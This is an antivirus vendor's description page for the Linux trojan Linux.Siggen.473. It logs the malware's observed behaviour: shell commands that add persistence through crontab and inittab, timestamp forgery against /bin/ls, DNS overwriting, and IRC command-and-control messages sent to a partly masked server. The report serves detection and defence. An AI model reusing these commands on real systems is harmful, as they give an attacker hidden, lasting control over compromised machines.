Per il corretto funzionamento del sito, è necessario attivare il supporto di JavaScript nel browser.
Linux.Siggen.473
Aggiunto al database dei virus Dr.Web:
2018-03-11
La descrizione è stata aggiunta:
2018-03-10
Technical Information
To ensure autorun and distribution:
Creates or modifies the following files:
/etc/inittab
/etc/rc.local
Malicious functions:
Launches itself as a daemon
Modifies router settings:
Launches processes:
sh -c echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &
sh -c chmod 700 <SAMPLE_FULL_PATH> > /dev/null 2>&1 &
sh -c touch -acmr /bin/ls <SAMPLE_FULL_PATH>
chmod 700 <SAMPLE_FULL_PATH>
touch -acmr /bin/ls <SAMPLE_FULL_PATH>
sh -c (crontab -l | grep -v \"<SAMPLE_FULL_PATH>\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00846930886) > /dev/null 2>&1
crontab -l
grep -v <SAMPLE_FULL_PATH>
grep -v no cron
grep -v lesshts/run.sh
sh -c echo \"* * * * * <SAMPLE_FULL_PATH> > /dev/null 2>&1 &\" >> /var/run/.x00846930886
sh -c crontab /var/run/.x00846930886
crontab /var/run/.x00846930886
sh -c rm -rf /var/run/.x00846930886
rm -rf /var/run/.x00846930886
sh -c cat /etc/inittab | grep -v \"<SAMPLE_FULL_PATH>\" > /etc/inittab2
cat /etc/inittab
sh -c echo \"0:2345:respawn:<SAMPLE_FULL_PATH>\" >> /etc/inittab2
sh -c cat /etc/inittab2 > /etc/inittab
cat /etc/inittab2
sh -c rm -rf /etc/inittab2
rm -rf /etc/inittab2
sh -c touch -acmr /bin/ls /etc/inittab
touch -acmr /bin/ls /etc/inittab
sh -c /bin/uname -n
sh -c nvram get router_name
/bin/uname -n
Performs operations with the file system:
Modifies file access rights:
<SAMPLE_FULL_PATH>
/var/spool/cron/crontabs/tmp.gwmiaS
Creates or modifies files:
/etc/resolv.conf
/var/run/.x00846930886
/run/.x00846930886
/var/spool/cron/crontabs/tmp.gwmiaS
/etc/inittab2
Deletes files:
/var/run/.x00846930886"
/etc/inittab2"
Network activity:
Awaits incoming connections on ports:
Establishes connection:
Connects to the following servers over the IRC protocol:
Server: 14#.#4.163.168; Command: NICK Mps|c|0|073187|unknown\nUSER x00 localhost localhost :1.0+tftp_jun112017\n
Server: 14#.#4.163.168; Command: PONG :C2174072\n
Server: 14#.#4.163.168; Command: MODE Mps|c|0|073187|unknown -xi\n
Server: 14#.#4.163.168; Command: MODE Mps|c|0|073187|unknown +B\n
Server: 14#.#4.163.168; Command: JOIN #m :777\n
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
Scaricate Dr.Web per Android
Gratis per 3 mesi
Tutti i componenti di protezione
Rinnovo versione di prova tramite AppGallery/Google Pay
Continuando a utilizzare questo sito, l'utente acconsente al nostro utilizzo di file Cookie e di altre tecnologie per la raccolta di informazioni statistiche sui visitatori. Per maggiori informazioni
OK